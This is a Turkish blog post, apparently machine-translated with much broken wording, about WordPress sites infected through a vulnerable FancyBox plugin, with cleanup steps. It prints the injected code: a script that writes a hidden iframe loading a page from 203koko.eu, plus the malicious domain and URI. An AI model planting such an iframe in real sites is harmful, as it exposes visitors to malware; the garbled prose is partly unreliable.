[Malware iframe 203koko] Malware Enfekte WordPress Siteleri

Web siteleri ve bloglar başlarında bu hafta bir sayı WordPress, uyarılar aldım malware ile enfekte içinden Google Webmaster.

Sorun Google Webmaster ifade edilen bir varlığıdır morina / senaryo iframe malware Kaynak web siteleri.

<script> if (navigator.userAgent.match (/ msie / i)) {document.write ('<iframe src = "http: /2000koko.eu/hjnfh/ipframe2000.php "width =" 203 "height =" 2 "> </ iframe> </ div> '); } </ Script>

O bir gibi görünüyor güvenlik açığı a fişe takmakmüktesebat WordPress için FancyBox hangi dün (05.02.2015) uzun bir süre için güncelleştirilmiş olmasaydı kadar.
Bu sorunu çözme ve virüsler siteleri dezenfekte Bu kötü amaçlı yazılım ile nispeten basit.
1. FancyBox eklentisini devre dışı bırakın.
2. Tüm FancyBox eklenti dosyalarını sunucudan sil (FTP ile)
3. Eklentinin yeni sürümünü yükleyin (Fancybox 3.0.4)

WordPress 3.0.4 için Fancybox

- 3.0.3'te belirtilen güvenlik sorunundan etkilenen ayarı yeniden adlandırdı. Bu, zararlı kodun, zararlı kod kaldırılmadan eklentinin güncellendiği sitelerde görünmesini engellemelidir.

WordPress 3.0.3 için Fancybox

- Bir güvenlik sorunu düzeltildi.

Kötü amaçlı yazılım bilgisi:

TİP: Iframe yönlendirme
HEDEF: Fancybox WordPress
KÖTÜ ALAN: 203koko.eu
KÖTÜ URI: http://203koko.eu/hjnfh/ipframe2.php
KÖTÜ RAW KOD: <iframe src = "http://203koko.eu/hjnfh/ipframe2.php" width = "20" height = "30"> </ iframe>
KÖTÜ SENARYO: <script> if (navigator.userAgent.match (/ MSIE / i)) {document.write ('<div style = "position: absolute; left: -2000px; genişliği: 2000px">

WordPress web sitesi malware çıkarmak.

[Malware iframe 203koko] Malware Enfekte WordPress Siteleri

Yazar hakkında

Stealth LP

Kurucu ve editör Stealth Ayarlar2006 tarihi.
Linux işletim sistemlerinde (özellikle CentOS), Mac OS X, Windows XP>, Windows 10 ve WordPress (CMS) Deneyim.

Leave a Comment